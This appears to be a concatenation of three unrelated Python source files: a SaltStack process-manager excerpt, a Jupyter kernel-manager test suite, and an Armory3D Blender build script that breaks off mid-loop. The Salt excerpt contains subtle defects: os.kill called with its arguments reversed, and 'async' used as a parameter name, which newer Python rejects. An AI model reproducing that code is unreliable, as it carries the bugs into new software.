def run(self, async=False):
'''
Load and start all available api modules
'''
log.debug('Process Manager starting!')
salt.utils.appendproctitle(self.name)
# make sure to kill the subprocesses if the parent is killed
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# There are not SIGTERM handlers installed, install ours
signal.signal(signal.SIGTERM, self.kill_children)
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# There are not SIGTERM handlers installed, install ours
signal.signal(signal.SIGINT, self.kill_children)
while True:
log.debug('Process manager iteration')
try:
# in case someone died while we were waiting...
self.check_children()
if not salt.utils.is_windows() and not async:
pid, exit_status = os.wait()
if pid not in self._process_map:
log.debug('Process of pid {0} died, not a known'
' process, will not restart'.format(pid))
continue
self.restart_process(pid)
elif async is True:
yield gen.sleep(10)
elif async is False:
# os.wait() is not supported on Windows.
time.sleep(10)
# OSError is raised if a signal handler is called (SIGTERM) during os.wait
except OSError:
break
def check_children(self):
'''
Check the children once
'''
if self._restart_processes is True:
for pid, mapping in six.iteritems(self._process_map):
if not mapping['Process'].is_alive():
self.restart_process(pid)
def kill_children(self, *args, **kwargs):
'''
Kill all of the children
'''
# check that this is the correct process, children inherit this
# handler, if we are in a child lets just run the original handler
if os.getpid() != self._pid:
if callable(self._sigterm_handler):
return self._sigterm_handler(*args)
elif self._sigterm_handler is not None:
return signal.default_int_handler(signal.SIGTERM)(*args)
else:
return
if salt.utils.is_windows():
with open(os.devnull, 'wb') as devnull:
for pid, p_map in six.iteritems(self._process_map):
# On Windows, we need to explicitly terminate sub-processes
# because the processes don't have a sigterm handler.
subprocess.call(
['taskkill', '/F', '/T', '/PID', str(pid)],
stdout=devnull, stderr=devnull
)
p_map['Process'].terminate()
else:
for pid, p_map in six.iteritems(self._process_map.copy()):
log.trace('Terminating pid {0}: {1}'.format(pid, p_map['Process']))
if args:
# escalate the signal to the process
os.kill(pid, args[0])
try:
p_map['Process'].terminate()
except OSError as exc:
if exc.errno != errno.ESRCH:
raise
if not p_map['Process'].is_alive():
try:
del self._process_map[pid]
except KeyError:
# Race condition
pass
end_time = time.time() + self.wait_for_kill # when to die
log.trace('Waiting to kill process manager children')
while self._process_map and time.time() < end_time:
for pid, p_map in six.iteritems(self._process_map.copy()):
log.trace('Joining pid {0}: {1}'.format(pid, p_map['Process']))
p_map['Process'].join(0)
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
# if any managed processes still remain to be handled, let's kill them
kill_iterations = 2
while kill_iterations >= 0:
kill_iterations -= 1
for pid, p_map in six.iteritems(self._process_map.copy()):
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
continue
log.trace('Killing pid {0}: {1}'.format(pid, p_map['Process']))
try:
os.kill(signal.SIGKILL, pid)
except OSError:
# in case the process has since decided to die, os.kill returns OSError
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
if self._process_map:
# Some processes disrespected the KILL signal!!!!
available_retries = kwargs.get('retry', 3)
if available_retries >= 0:
log.info(
'Some processes failed to respect the KILL signal: %s',
'; '.join(
'Process: {0} (Pid: {1})'.format(v['Process'], k) for
(k, v) in self._process_map.items()
)
)
log.info('kill_children retries left: %s', available_retries)
kwargs['retry'] = available_retries - 1
return self.kill_children(*args, **kwargs)
else:
log.warning(
'Failed to kill the following processes: %s',
'; '.join(
'Process: {0} (Pid: {1})'.format(v['Process'], k) for
(k, v) in self._process_map.items()
)
)
log.warning(
'Salt will either fail to terminate now or leave some '
'zombie processes behind'
)
class MultiprocessingProcess(multiprocessing.Process, NewStyleClassMixIn):
def __new__(cls, *args, **kwargs):
instance = super(MultiprocessingProcess, cls).__new__(cls)
# Patch the run method at runtime because decorating the run method
# with a function with a similar behavior would be ignored once this
# class'es run method is overridden.
instance._original_run = instance.run
instance.run = instance._run
return instance
def __init__(self, *args, **kwargs):
if (salt.utils.is_windows() and
not hasattr(self, '_is_child') and
self.__setstate__.__code__ is
MultiprocessingProcess.__setstate__.__code__):
# On Windows, if a derived class hasn't defined __setstate__, that
# means the 'MultiprocessingProcess' version will be used. For this
# version, save a copy of the args and kwargs to use with its
# __setstate__ and __getstate__.
# We do this so that __init__ will be invoked on Windows in the
# child process so that a register_after_fork() equivalent will
# work on Windows. Note that this will only work if the derived
# class uses the exact same args and kwargs as this class. Hence
# this will also work for 'SignalHandlingMultiprocessingProcess'.
# However, many derived classes take params that they don't pass
# down (eg opts). Those classes need to override __setstate__ and
# __getstate__ themselves.
self._args_for_getstate = copy.copy(args)
self._kwargs_for_getstate = copy.copy(kwargs)
self.log_queue = kwargs.pop('log_queue', None)
if self.log_queue is None:
self.log_queue = salt.log.setup.get_multiprocessing_logging_queue()
else:
# Set the logging queue so that it can be retrieved later with
# salt.log.setup.get_multiprocessing_logging_queue().
salt.log.setup.set_multiprocessing_logging_queue(self.log_queue)
# Call __init__ from 'multiprocessing.Process' only after removing
# 'log_queue' from kwargs.
super(MultiprocessingProcess, self).__init__(*args, **kwargs)
if salt.utils.is_windows():
# On Windows, the multiprocessing.Process object is reinitialized
# in the child process via the constructor. Due to this, methods
# such as ident() and is_alive() won't work properly. So we use
# our own creation '_is_child' for this purpose.
if hasattr(self, '_is_child'):
# On Windows, no need to call register_after_fork().
# register_after_fork() would only work on Windows if called
# from the child process anyway. Since we know this is the
# child process, call __setup_process_logging() directly.
self.__setup_process_logging()
multiprocessing.util.Finalize(
self,
salt.log.setup.shutdown_multiprocessing_logging,
exitpriority=16
)
else:
multiprocessing.util.register_after_fork(
self,
MultiprocessingProcess.__setup_process_logging
)
multiprocessing.util.Finalize(
self,
salt.log.setup.shutdown_multiprocessing_logging,
exitpriority=16
)
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
args = state['args']
kwargs = state['kwargs']
# This will invoke __init__ of the most derived class.
self.__init__(*args, **kwargs)
def __getstate__(self):
args = self._args_for_getstate
kwargs = self._kwargs_for_getstate
if 'log_queue' not in kwargs:
kwargs['log_queue'] = self.log_queue
# Remove the version of these in the parent process since
# they are no longer needed.
del self._args_for_getstate
del self._kwargs_for_getstate
return {'args': args,
'kwargs': kwargs}
def __setup_process_logging(self):
salt.log.setup.setup_multiprocessing_logging(self.log_queue)
def _run(self):
try:
return self._original_run()
except SystemExit:
# These are handled by multiprocessing.Process._bootstrap()
raise
except Exception as exc:
log.error(
'An un-handled exception from the multiprocessing process '
'\'%s\' was caught:\n', self.name, exc_info=True)
# Re-raise the exception. multiprocessing.Process will write it to
# sys.stderr and set the proper exitcode and we have already logged
# it above.
raise
class SignalHandlingMultiprocessingProcess(MultiprocessingProcess):
def __init__(self, *args, **kwargs):
super(SignalHandlingMultiprocessingProcess, self).__init__(*args, **kwargs)
if salt.utils.is_windows():
if hasattr(self, '_is_child'):
# On Windows, no need to call register_after_fork().
# register_after_fork() would only work on Windows if called
# from the child process anyway. Since we know this is the
# child process, call __setup_signals() directly.
self.__setup_signals()
else:
multiprocessing.util.register_after_fork(
self,
SignalHandlingMultiprocessingProcess.__setup_signals
)
def __setup_signals(self):
signal.signal(signal.SIGINT, self._handle_signals)
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe):
msg = '{0} received a '.format(self.__class__.__name__)
if signum == signal.SIGINT:
msg += 'SIGINT'
elif signum == signal.SIGTERM:
msg += 'SIGTERM'
msg += '. Exiting'
log.debug(msg)
exit(salt.defaults.exitcodes.EX_OK)
def start(self):
with default_signals(signal.SIGINT, signal.SIGTERM):
super(SignalHandlingMultiprocessingProcess, self).start()
@contextlib.contextmanager
def default_signals(*signals):
old_signals = {}
for signum in signals:
old_signals[signum] = signal.getsignal(signum)
signal.signal(signum, signal.SIG_DFL)
# Do whatever is needed with the reset signals
yield
# Restore signals
for signum in old_signals:
signal.signal(signum, old_signals[signum])
del old_signals
|
test_kernelmanager.py
|
"""Tests for the KernelManager"""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
import asyncio
import json
import os
pjoin = os.path.join
import signal
from subprocess import PIPE
import sys
import time
import threading
import multiprocessing as mp
import pytest
from unittest import TestCase
from tornado.testing import AsyncTestCase, gen_test, gen
from traitlets.config.loader import Config
from jupyter_core import paths
from jupyter_client import KernelManager, AsyncKernelManager
from ..manager import start_new_kernel, start_new_async_kernel
from .utils import test_env, skip_win32
TIMEOUT = 30
class TestKernelManager(TestCase):
def setUp(self):
self.env_patch = test_env()
self.env_patch.start()
def tearDown(self):
self.env_patch.stop()
def _install_test_kernel(self):
kernel_dir = pjoin(paths.jupyter_data_dir(), 'kernels', 'signaltest')
os.makedirs(kernel_dir)
with open(pjoin(kernel_dir, 'kernel.json'), 'w') as f:
f.write(json.dumps({
'argv': [sys.executable,
'-m', 'jupyter_client.tests.signalkernel',
'-f', '{connection_file}'],
'display_name': "Signal Test Kernel",
'env': {'TEST_VARS': '${TEST_VARS}:test_var_2'},
}))
def _get_tcp_km(self):
c = Config()
km = KernelManager(config=c)
return km
def _get_ipc_km(self):
c = Config()
c.KernelManager.transport = 'ipc'
c.KernelManager.ip = 'test'
km = KernelManager(config=c)
return km
def _run_lifecycle(self, km):
km.start_kernel(stdout=PIPE, stderr=PIPE)
self.assertTrue(km.is_alive())
km.restart_kernel(now=True)
self.assertTrue(km.is_alive())
km.interrupt_kernel()
self.assertTrue(isinstance(km, KernelManager))
km.shutdown_kernel(now=True)
self.assertTrue(km.context.closed)
def test_tcp_lifecycle(self):
km = self._get_tcp_km()
self._run_lifecycle(km)
@skip_win32
def test_ipc_lifecycle(self):
km = self._get_ipc_km()
self._run_lifecycle(km)
def test_get_connect_info(self):
km = self._get_tcp_km()
cinfo = km.get_connection_info()
keys = sorted(cinfo.keys())
expected = sorted([
'ip', 'transport',
'hb_port', 'shell_port', 'stdin_port', 'iopub_port', 'control_port',
'key', 'signature_scheme',
])
self.assertEqual(keys, expected)
@skip_win32
def test_signal_kernel_subprocesses(self):
self._install_test_kernel()
km, kc = start_new_kernel(kernel_name='signaltest')
def execute(cmd):
kc.execute(cmd)
reply = kc.get_shell_msg(TIMEOUT)
content = reply['content']
self.assertEqual(content['status'], 'ok')
return content
self.addCleanup(kc.stop_channels)
self.addCleanup(km.shutdown_kernel)
N = 5
for i in range(N):
execute("start")
time.sleep(1) # make sure subprocs stay up
reply = execute('check')
self.assertEqual(reply['user_expressions']['poll'], [None] * N)
# start a job on the kernel to be interrupted
kc.execute('sleep')
time.sleep(1) # ensure sleep message has been handled before we interrupt
km.interrupt_kernel()
reply = kc.get_shell_msg(TIMEOUT)
content = reply['content']
self.assertEqual(content['status'], 'ok')
self.assertEqual(content['user_expressions']['interrupted'], True)
# wait up to 5s for subprocesses to handle signal
for i in range(50):
reply = execute('check')
if reply['user_expressions']['poll'] != [-signal.SIGINT] * N:
time.sleep(0.1)
else:
break
# verify that subprocesses were interrupted
self.assertEqual(reply['user_expressions']['poll'], [-signal.SIGINT] * N)
def test_start_new_kernel(self):
self._install_test_kernel()
km, kc = start_new_kernel(kernel_name='signaltest')
self.addCleanup(kc.stop_channels)
self.addCleanup(km.shutdown_kernel)
self.assertTrue(km.is_alive())
self.assertTrue(kc.is_alive())
self.assertFalse(km.context.closed)
def _env_test_body(self, kc):
def execute(cmd):
kc.execute(cmd)
reply = kc.get_shell_msg(TIMEOUT)
content = reply['content']
self.assertEqual(content['status'], 'ok')
return content
reply = execute('env')
self.assertIsNotNone(reply)
self.assertEqual(reply['user_expressions']['env'], 'test_var_1:test_var_2')
def test_templated_kspec_env(self):
self._install_test_kernel()
km, kc = start_new_kernel(kernel_name='signaltest')
self.addCleanup(kc.stop_channels)
self.addCleanup(km.shutdown_kernel)
self.assertTrue(km.is_alive())
self.assertTrue(kc.is_alive())
self.assertFalse(km.context.closed)
self._env_test_body(kc)
def _start_kernel_with_cmd(self, kernel_cmd, extra_env, **kwargs):
"""Start a new kernel, and return its Manager and Client"""
km = KernelManager(kernel_name='signaltest')
km.kernel_cmd = kernel_cmd
km.extra_env = extra_env
km.start_kernel(**kwargs)
kc = km.client()
kc.start_channels()
try:
kc.wait_for_ready(timeout=60)
except RuntimeError:
kc.stop_channels()
km.shutdown_kernel()
raise
return km, kc
def test_templated_extra_env(self):
self._install_test_kernel()
kernel_cmd = [sys.executable,
'-m', 'jupyter_client.tests.signalkernel',
'-f', '{connection_file}']
extra_env = {'TEST_VARS': '${TEST_VARS}:test_var_2'}
km, kc = self._start_kernel_with_cmd(kernel_cmd, extra_env)
self.addCleanup(kc.stop_channels)
self.addCleanup(km.shutdown_kernel)
self.assertTrue(km.is_alive())
self.assertTrue(kc.is_alive())
self.assertFalse(km.context.closed)
self._env_test_body(kc)
def test_cleanup_context(self):
km = KernelManager()
self.assertIsNotNone(km.context)
km.cleanup_resources(restart=False)
self.assertTrue(km.context.closed)
def test_no_cleanup_shared_context(self):
"""kernel manager does not terminate shared context"""
import zmq
ctx = zmq.Context()
km = KernelManager(context=ctx)
self.assertEquals(km.context, ctx)
self.assertIsNotNone(km.context)
km.cleanup_resources(restart=False)
self.assertFalse(km.context.closed)
self.assertFalse(ctx.closed)
ctx.term()
class TestParallel:
@pytest.fixture(autouse=True)
def env(self):
env_patch = test_env()
env_patch.start()
yield
env_patch.stop()
@pytest.fixture(params=['tcp', 'ipc'])
def transport(self, request):
return request.param
@pytest.fixture
def config(self, transport):
c = Config()
c.transport = transport
if transport == 'ipc':
c.ip = 'test'
return c
def _install_test_kernel(self):
kernel_dir = pjoin(paths.jupyter_data_dir(), 'kernels', 'signaltest')
os.makedirs(kernel_dir)
with open(pjoin(kernel_dir, 'kernel.json'), 'w') as f:
f.write(json.dumps({
'argv': [sys.executable,
'-m', 'jupyter_client.tests.signalkernel',
'-f', '{connection_file}'],
'display_name': "Signal Test Kernel",
}))
def test_start_sequence_kernels(self, config):
"""Ensure that a sequence of kernel startups doesn't break anything."""
self._install_test_kernel()
self._run_signaltest_lifecycle(config)
self._run_signaltest_lifecycle(config)
self._run_signaltest_lifecycle(config)
def test_start_parallel_thread_kernels(self, config):
self._install_test_kernel()
self._run_signaltest_lifecycle(config)
thread = threading.Thread(target=self._run_signaltest_lifecycle, args=(config,))
thread2 = threading.Thread(target=self._run_signaltest_lifecycle, args=(config,))
try:
thread.start()
thread2.start()
finally:
thread.join()
thread2.join()
def test_start_parallel_process_kernels(self, config):
self._install_test_kernel()
self._run_signaltest_lifecycle(config)
thread = threading.Thread(target=self._run_signaltest_lifecycle, args=(config,))
proc = mp.Process(target=self._run_signaltest_lifecycle, args=(config,))
try:
thread.start()
proc.start()
finally:
thread.join()
proc.join()
assert proc.exitcode == 0
def test_start_sequence_process_kernels(self, config):
self._install_test_kernel()
self._run_signaltest_lifecycle(config)
proc = mp.Process(target=self._run_signaltest_lifecycle, args=(config,))
try:
proc.start()
finally:
proc.join()
assert proc.exitcode == 0
def _prepare_kernel(self, km, startup_timeout=TIMEOUT, **kwargs):
km.start_kernel(**kwargs)
kc = km.client()
kc.start_channels()
try:
kc.wait_for_ready(timeout=startup_timeout)
except RuntimeError:
kc.stop_channels()
km.shutdown_kernel()
raise
return kc
def _run_signaltest_lifecycle(self, config=None):
km = KernelManager(config=config, kernel_name='signaltest')
kc = self._prepare_kernel(km, stdout=PIPE, stderr=PIPE)
def execute(cmd):
kc.execute(cmd)
reply = kc.get_shell_msg(TIMEOUT)
content = reply['content']
assert content['status'] == 'ok'
return content
execute("start")
assert km.is_alive()
execute('check')
assert km.is_alive()
km.restart_kernel(now=True)
assert km.is_alive()
execute('check')
km.shutdown_kernel()
assert km.context.closed
class TestAsyncKernelManager(AsyncTestCase):
def setUp(self):
super(TestAsyncKernelManager, self).setUp()
self.env_patch = test_env()
self.env_patch.start()
def tearDown(self):
super(TestAsyncKernelManager, self).tearDown()
self.env_patch.stop()
def _install_test_kernel(self):
kernel_dir = pjoin(paths.jupyter_data_dir(), 'kernels', 'signaltest')
os.makedirs(kernel_dir)
with open(pjoin(kernel_dir, 'kernel.json'), 'w') as f:
f.write(json.dumps({
'argv': [sys.executable,
'-m', 'jupyter_client.tests.signalkernel',
'-f', '{connection_file}'],
'display_name': "Signal Test Kernel",
}))
def _get_tcp_km(self):
c = Config()
km = AsyncKernelManager(config=c)
return km
def _get_ipc_km(self):
c = Config()
c.KernelManager.transport = 'ipc'
c.KernelManager.ip = 'test'
km = AsyncKernelManager(config=c)
return km
async def _run_lifecycle(self, km):
await km.start_kernel(stdout=PIPE, stderr=PIPE)
self.assertTrue(await km.is_alive())
await km.restart_kernel(now=True)
self.assertTrue(await km.is_alive())
await km.interrupt_kernel()
self.assertTrue(isinstance(km, AsyncKernelManager))
await km.shutdown_kernel(now=True)
self.assertFalse(await km.is_alive())
self.assertTrue(km.context.closed)
@gen_test
async def test_tcp_lifecycle(self):
km = self._get_tcp_km()
await self._run_lifecycle(km)
@skip_win32
@gen_test
async def test_ipc_lifecycle(self):
km = self._get_ipc_km()
await self._run_lifecycle(km)
def test_get_connect_info(self):
km = self._get_tcp_km()
cinfo = km.get_connection_info()
keys = sorted(cinfo.keys())
expected = sorted([
'ip', 'transport',
'hb_port', 'shell_port', 'stdin_port', 'iopub_port', 'control_port',
'key', 'signature_scheme',
])
self.assertEqual(keys, expected)
@skip_win32
@gen_test(timeout=10.0)
async def test_signal_kernel_subprocesses(self):
self._install_test_kernel()
km, kc = await start_new_async_kernel(kernel_name='signaltest')
async def execute(cmd):
kc.execute(cmd)
reply = await kc.get_shell_msg(TIMEOUT)
content = reply['content']
self.assertEqual(content['status'], 'ok')
return content
# Ensure that shutdown_kernel and stop_channels are called at the end of the test.
# Note: we cannot use addCleanup(<func>) for these since it doesn't prpperly handle
# coroutines - which km.shutdown_kernel now is.
try:
N = 5
for i in range(N):
await execute("start")
await asyncio.sleep(1) # make sure subprocs stay up
reply = await execute('check')
self.assertEqual(reply['user_expressions']['poll'], [None] * N)
# start a job on the kernel to be interrupted
kc.execute('sleep')
await asyncio.sleep(1) # ensure sleep message has been handled before we interrupt
await km.interrupt_kernel()
reply = await kc.get_shell_msg(TIMEOUT)
content = reply['content']
self.assertEqual(content['status'], 'ok')
self.assertEqual(content['user_expressions']['interrupted'], True)
# wait up to 5s for subprocesses to handle signal
for i in range(50):
reply = await execute('check')
if reply['user_expressions']['poll'] != [-signal.SIGINT] * N:
await asyncio.sleep(0.1)
else:
break
# verify that subprocesses were interrupted
self.assertEqual(reply['user_expressions']['poll'], [-signal.SIGINT] * N)
finally:
await km.shutdown_kernel(now=True)
kc.stop_channels()
self.assertTrue(km.context.closed)
@gen_test(timeout=10.0)
async def test_start_new_async_kernel(self):
self._install_test_kernel()
km, kc = await start_new_async_kernel(kernel_name='signaltest')
# Ensure that shutdown_kernel and stop_channels are called at the end of the test.
# Note: we cannot use addCleanup(<func>) for these since it doesn't properly handle
# coroutines - which km.shutdown_kernel now is.
try:
self.assertTrue(await km.is_alive())
self.assertTrue(await kc.is_alive())
finally:
await km.shutdown_kernel(now=True)
kc.stop_channels()
self.assertTrue(km.context.closed)
|
make.py
|
import os
import glob
import time
import shutil
import bpy
import json
import stat
from bpy.props import *
import subprocess
import threading
import webbrowser
import arm.utils
import arm.write_data as write_data
import arm.make_logic as make_logic
import arm.make_renderpath as make_renderpath
import arm.make_world as make_world
import arm.make_state as state
import arm.assets as assets
import arm.log as log
import arm.lib.make_datas
import arm.lib.server
from arm.exporter import ArmoryExporter
exporter = ArmoryExporter()
scripts_mtime = 0 # Monitor source changes
profile_time = 0
def run_proc(cmd, done):
def fn(p, done):
p.wait()
if done != None:
done()
p = subprocess.Popen(cmd)
threading.Thread(target=fn, args=(p, done)).start()
return p
def compile_shader_pass(res, raw_shaders_path, shader_name, defs, make_variants):
os.chdir(raw_shaders_path + '/' + shader_name)
# Open json file
json_name = shader_name + '.json'
with open(json_name) as f:
json_file = f.read()
json_data = json.loads(json_file)
fp = arm.utils.get_fp_build()
arm.lib.make_datas.make(res, shader_name, json_data, fp, defs, make_variants)
path = fp + '/compiled/Shaders'
c = json_data['contexts'][0]
for s in ['vertex_shader', 'fragment_shader', 'geometry_shader', 'tesscontrol_shader', 'tesseval_shader']:
if s in c:
shutil.copy(c[s], path + '/' + c[s].split('/')[-1])
def remove_readonly(func, path, excinfo):
os.chmod(path, stat.S_IWRITE)
func(path)
def export_data(fp, sdk_path):
global exporter
wrd = bpy.data.worlds['Arm']
print('\nArmory v{0} ({1})'.format(wrd.arm_version, wrd.arm_commit))
print('OS: ' + arm.utils.get_os() + ', Target: ' + state.target + ', GAPI: ' + arm.utils.get_gapi() + ', Blender: ' + bpy.app.version_string)
# Clean compiled variants if cache is disabled
build_dir = arm.utils.get_fp_build()
if wrd.arm_cache_build == False:
if os.path.isdir(build_dir + '/debug/html5-resources'):
shutil.rmtree(build_dir + '/debug/html5-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/krom-resources'):
shutil.rmtree(build_dir + '/krom-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/debug/krom-resources'):
shutil.rmtree(build_dir + '/debug/krom-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/windows-resources'):
shutil.rmtree(build_dir + '/windows-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/linux-resources'):
shutil.rmtree(build_dir + '/linux-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/osx-resources'):
shutil.rmtree(build_dir + '/osx-resources', onerror=remove_readonly)
if os.path.isdir(build_dir + '/compiled/Shaders'):
shutil.rmtree(build_dir + '/compiled/Shaders', onerror=remove_readonly)
raw_shaders_path = sdk_path + '/armory/Shaders/'
assets_path = sdk_path + '/armory/Assets/'
export_physics = bpy.data.worlds['Arm'].arm_physics != 'Disabled'
export_navigation = bpy.data.worlds['Arm'].arm_navigation != 'Disabled'
export_ui = bpy.data.worlds['Arm'].arm_ui != 'Disabled'
assets.reset()
# Build node trees
ArmoryExporter.import_traits = []
make_logic.build()
make_world.build()
make_renderpath.build()
# Export scene data
assets.embedded_data = sorted(list(set(assets.embedded_data)))
physics_found = False
navigation_found = False
ui_found = False
ArmoryExporter.compress_enabled = state.is_publish and wrd.arm_asset_compression
ArmoryExporter.optimize_enabled = state.is_publish and wrd.arm_optimize_data
if not os.path.exists(build_dir + '/compiled/Assets'):
os.makedirs(build_dir + '/compiled/Assets')
for scene in bpy.data.scenes:
if scene.arm_export:
ext = '.zip' if ArmoryExporter.compress_enabled else '.arm'
asset_path = build_dir + '/compiled/Assets/' + arm.utils.safestr(scene.name) + ext
exporter.execute(bpy.context, asset_path, scene=scene)
if ArmoryExporter.export_physics:
physics_found = True
if ArmoryExporter.export_navigation:
navigation_found = True
if ArmoryExporter.export_ui:
ui_found = True
assets.add(asset_path)
if physics_found == False: # Disable physics if no rigid body is exported
export_physics = False
if navigation_found == False:
export_navigation = False
if ui_found == False:
export_ui = False
if wrd.arm_ui == 'Enabled':
export_ui = True
modules = []
if wrd.arm_audio == 'Enabled':
modules.append('audio')
if export_physics:
modules.append('physics')
if export_navigation:
modules.append('navigation')
if export_ui:
modules.append('ui')
if wrd.arm_formatlib == 'Enabled':
modules.append('format')
print('Exported modules: ' + str(modules))
defs = arm.utils.def_strings_to_array(wrd.world_defs)
cdefs = arm.utils.def_strings_to_array(wrd.compo_defs)
print('Shader flags: ' + str(defs))
if wrd.arm_debug_console:
print('Khafile flags: ' + str(assets.khafile_defs))
# Render path is configurable at runtime
has_config = wrd.arm_write_config or os.path.exists(arm.utils.get_fp() + '/Bundled/config.arm')
# Write compiled.inc
shaders_path = build_dir + '/compiled/Shaders'
if not os.path.exists(shaders_path):
os.makedirs(shaders_path)
write_data.write_compiledglsl(defs + cdefs, make_variants=has_config)
# Write referenced shader passes
if not os.path.isfile(build_dir + '/compiled/Shaders/shader_datas.arm') or state.last_world_defs != wrd.world_defs:
res = {}
res['shader_datas'] = []
for ref in assets.shader_passes:
# Ensure shader pass source exists
if not os.path.exists(raw_shaders_path + '/' + ref):
continue
assets.shader_passes_assets[ref] = []
if ref.startswith('compositor_pass'):
compile_shader_pass(res, raw_shaders_path, ref, defs + cdefs, make_variants=has_config)
else:
compile_shader_pass(res, raw_shaders_path, ref, defs, make_variants=has_config)
arm.utils.write_arm(shaders_path + '/shader_datas.arm', res)
for ref in assets.shader_passes:
for s in assets.shader_passes_assets[ref]:
assets.add_shader(shaders_path + '/' + s + '.glsl')
for file in assets.shaders_external:
name = file.split('/')[-1].split('\\')[-1]
target = build_dir + '/compiled/Shaders/' + name
if not os.path.exists(target):
shutil.copy(file, target)
state.last_world_defs = wrd.world_defs
# Reset path
os.chdir(fp)
# Copy std shaders
if not os.path.isdir(build_dir + '/compiled/Shaders/std'):
shutil.copytree(raw_shaders_path + 'std', build_dir + '/compiled/Shaders/std')
# Write config.arm
resx, resy = arm.utils.get_render_resolution(arm.utils.get_active_scene())
if wrd.arm_write_config:
write_data.write_config(resx, resy)
# Write khafile.js
enable_dce = state.is_publish and wrd.arm_dce
import_logic = not state.is_publish and arm.utils.logic_editor_space() != None
write_data.write_khafilejs(state.is_play, export_physics, export_navigation, export_ui, state.is_publish, enable_dce, ArmoryExporter.import_traits, import_logic)
# Write Main.hx - depends on write_khafilejs for writing number of assets
scene_name = arm.utils.get_project_scene_name()
write_data.write_mainhx(scene_name, resx, resy, state.is_play, state.is_publish)
if scene_name != state.last_scene or resx != state.last_resx or resy != state.last_resy:
wrd.arm_recompile = True
state.last_resx = resx
state.last_resy = resy
state.last_scene = scene_name
def compile(assets_only=False):
wrd = bpy.data.worlds['Arm']
fp = arm.utils.get_fp()
os.chdir(fp)
# Set build command
target_name = state.target
node_path = arm.utils.get_node_path()
khamake_path = arm.utils.get_khamake_path()
cmd = [node_path, khamake_path]
kha_target_name = arm.utils.get_kha_target(target_name)
if kha_target_name != '':
cmd.append(kha_target_name)
# Custom exporter
if state.is_export:
item = wrd.arm_exporterlist[wrd.arm_exporterlist_index]
if item.arm_project_target == 'custom' and item.arm_project_khamake != '':
for s in item.arm_project_khamake.split(' '):
cmd.append(s)
ffmpeg_path = arm.utils.get_ffmpeg_path() # Path to binary
if ffmpeg_path != '':
cmd.append('--ffmpeg')
cmd.append(ffmpeg_path) # '"' + ffmpeg_path + '"'
state.export_gapi = arm.utils.get_gapi()
cmd.append('-g')
cmd.append(state.export_gapi)
if arm.utils.get_legacy_shaders() or 'ios' in state.target:
if 'html5' in state.target or 'ios' in state.target:
pass
else:
cmd.append('--shaderversion')
cmd.append('110')
elif 'android' in state.target or 'html5' in state.target:
cmd.append('--shaderversion')
cmd.append('300')
else:
cmd.append('--shaderversion')
cmd.append('330')
if '_VR' in wrd.world_defs:
cmd.append('--vr')
cmd.append('webvr')
if arm.utils.get_rp().rp_renderer == 'Raytracer':
cmd.append('--raytrace')
cmd.append('dxr')
dxc_path = fp + '/HlslShaders/dxc.exe'
subprocess.Popen([dxc_path, '-Zpr', '-Fo', fp + '/Bundled/raytrace.cso', '-T', 'lib_6_3', fp + '/HlslShaders/raytrace.hlsl']).wait()
if arm.utils.get_khamake_threads() > 1:
cmd.append('--parallelAssetConversion')
cmd.append(str(arm.utils.get_khamake_threads()))
compilation_server = False
cmd.append('--to')
if (kha_target_name == 'krom' and not state.is_publish) or (kha_target_name == 'html5' and not state.is_publish):
cmd.append(arm.utils.build_dir() + '/debug')
# Start compilation server
if kha_target_name == 'krom' and arm.utils.get_compilation_server() and not assets_only and wrd.arm_cache_build:
compilation_server = True
arm.lib.server.run_haxe(arm.utils.get_haxe_path())
else:
cmd.append(arm.utils.build_dir())
if assets_only or compilation_server:
cmd.append('--nohaxe')
cmd.append('--noproject')
print("Running: ", cmd)
print("Using project from " + arm.utils.get_fp())
state.proc_build = run_proc(cmd, assets_done if compilation_server else build_done)
def build(target, is_play=False, is_publish=False, is_export=False):
global profile_time
profile_time = time.time()
state.target = target
state.is_play = is_play
state.is_publish = is_publish
state.is_export = is_export
# Save blend
if arm.utils.get_save_on_build():
bpy.ops.wm.save_mainfile()
log.clear()
# Set camera in active scene
active_scene = arm.utils.get_active_scene()
if active_scene.camera == None:
for o in active_scene.objects:
if o.type == 'CAMERA':
active_scene.camera = o
break
# Get paths
sdk_path = arm.utils.get_sdk_path()
raw_shaders_path = sdk_path + '/armory/Shaders/'
# Set dir
fp = arm.utils.get_fp()
os.chdir(fp)
# Create directories
wrd = bpy.data.worlds['Arm']
sources_path = 'Sources/' + arm.utils.safestr(wrd.arm_project_package)
if not os.path.exists(sources_path):
os.makedirs(sources_path)
# Save external scripts edited inside Blender
write_texts = False
for text in bpy.data.texts:
if text.filepath != '' and text.is_dirty:
write_texts = True
break
if write_texts:
area = bpy.context.area
old_type = area.type
area.type = 'TEXT_EDITOR'
for text in bpy.data.texts:
if text.filepath != '' and text.is_dirty and os.path.isfile(text.filepath):
area.spaces[0].text = text
bpy.ops.text.save()
area.type = old_type
# Save internal Haxe scripts
for text in bpy.data.texts:
if text.filepath == '' and text.name[-3:] == '.hx':
with open('Sources/' + arm.utils.safestr(wrd.arm_project_package) + '/' + text.name, 'w') as f:
f.write(text.as_string())
# Export data
export_data(fp, sdk_path)
if state.target == 'html5':
w, h = arm.utils.get_render_resolution(arm.utils.get_active_scene())
write_data.write_indexhtml(w, h, is_publish)
# Bundle files from include dir
if os.path.isdir('include'):
dest = '/html5/' if is_publish else '/debug/html5/'
for fn in glob.iglob(os.path.join('include', '**'), recursive=False):
